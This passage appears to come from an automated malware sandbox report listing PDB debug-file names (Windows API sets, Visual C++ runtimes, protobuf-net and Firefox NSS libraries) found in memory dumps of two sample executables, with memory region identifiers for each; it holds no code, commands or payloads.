              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.441739439.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492747934.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495171916.00000000047E8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.464187220.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495398232.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495083457.00000000047E4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495257742.00000000047EC000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.459612640.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.460534507.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.495535221.0000000004800000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495638921.0000000004804000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.i386.pdbGCTL source: 6CJfScEKhr.exe, 0000000E.00000002.529001641.000000006F491000.00000020.00000001.01000000.0000000C.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502845901.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491428593.000000000484C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: 6CJfScEKhr.exe, 0000000E.00000003.483837799.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499068688.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483758150.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.529520366.000000006FB4A000.00000002.00000001.01000000.0000000B.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.491983533.0000000004784000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492145996.0000000004788000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.432567018.0000000003E40000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.455052099.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483088942.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483008786.0000000002A14000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.491983533.0000000004784000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.434459144.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492267505.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492145996.0000000004788000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.434513635.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.432567018.0000000003E40000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.473472620.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496147713.0000000004828000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496294114.000000000482C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.475741120.0000000003E54000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.495535221.0000000004800000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.466919518.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.466873515.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.465897904.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.465074490.0000000003E44000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256 source: 6CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.518824108.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519864421.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.520995677.0000000005350000.00000004.08000000.00040000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519547093.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdb source: 6CJfScEKhr.exe, 0000000E.00000002.528193608.000000006ED61000.00000020.00000001.01000000.0000000D.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500081858.0000000003B38000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.485003516.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.484887053.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.458364916.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502531240.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488986283.0000000004970000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.460534507.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.461364025.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495083457.00000000047E4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.430697897.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495171916.00000000047E8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495471714.00000000047F4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.464187220.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495398232.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495083457.00000000047E4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.465074490.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495257742.00000000047EC000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.443952981.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.442753555.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492747934.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493168297.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492875018.00000000047A8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493075719.00000000047AC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.470337933.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.470419906.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496007152.000000000481C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495924593.0000000004818000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.448743941.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.448852988.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496147713.0000000004828000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.471412090.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.i386.pdb source: 6CJfScEKhr.exe, 0000000E.00000002.529001641.000000006F491000.00000020.00000001.01000000.0000000C.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502845901.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491428593.000000000484C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495171916.00000000047E8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495083457.00000000047E4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495257742.00000000047EC000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.459612640.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 